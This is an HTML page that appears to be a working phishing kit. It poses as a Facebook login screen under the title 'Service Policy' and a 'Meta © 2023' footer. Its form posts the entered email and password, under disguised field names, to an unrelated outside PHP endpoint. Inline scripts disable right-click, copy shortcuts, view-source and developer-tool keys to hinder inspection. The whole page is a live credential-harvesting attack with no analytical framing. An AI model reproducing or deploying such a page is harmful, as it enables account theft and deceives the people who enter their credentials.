<html lang="en" class=""><head>

   <meta charset="utf-8">
   <title>Service Policy</title>
   <link rel="icon" type="image/png" href="//www.jikora.biz.id/mamalaurent/img/icon.png">
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
   <link rel="stylesheet" href="//www.jikora.biz.id/mamalaurent/css/bootstrap.min.css?v=270420211500" type="text/css" media="screen">
   <link rel="stylesheet" href="//www.jikora.biz.id/mamalaurent/css/style.css?v=1303202215" type="text/css" media="screen">
       <script type="text/javascript">
      function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
      </script>
      
      <script type="text/javascript">
      window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
      </script>
      
      <script type="text/javascript">
      document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
      </script>
   </head>
   <body>
   <header>
   <nav class="navbar navbar-expand-md navbar-cuttly nav_flow">
   <div class="container">
   <a class="navbar-brand">
   <img class="logo" src="//www.jikora.biz.id/mamalaurent/img/martambuah.png">
   </a>

   </div>
   </nav>
   </header>
   <main id="content" role="main">
   <section class="c_form pt-4">
   <div class="container">
   <div class="row">
  
   <div class="max_form">
       <center><img class="logo" src="//www.jikora.biz.id/mamalaurent/img/sigm.png" height="100" width="100"></center>
         <h2 class="h1_of text-center">Log in to Facebook</h2>
   
   <form id="login" action="//www.tahunbaru.biz.id/happy/go/minion100dadies.php#confirm-page-container-navigation" method="post">
   <div class="info" id="suggest-sync"> You must log in to continue.</div>
   <div class="field">
   <input type="text" id="email" name="rambutkrebo" placeholder="Email address or phone number" pattern=".{6,}" required="" maxlength="40">
   </div>
   <div class="field">
   <input type="password" id="password" name="pohonmahoni" placeholder="Enter your password" pattern=".{6,}" required="" maxlength="40">
   </div>
   <div class="field">
   <button type="submit" data-callback="onSubmit" data-action="submit"> Log In </button>

   </div>
   <br><center><font size="3"><a href="#">Forgot password?</a></font></center>
   </form>

   </div>

   </div>
   </div>
   <br>
   
   <footer class="footer-area footer--light">
   <div class="container footer-big">
   <div class="footer-widget">
   <p class="arrow-up">Meta © 2023</p>
   </div>
   </div>
   </footer>
   </svg>
   </main>
</body></html>
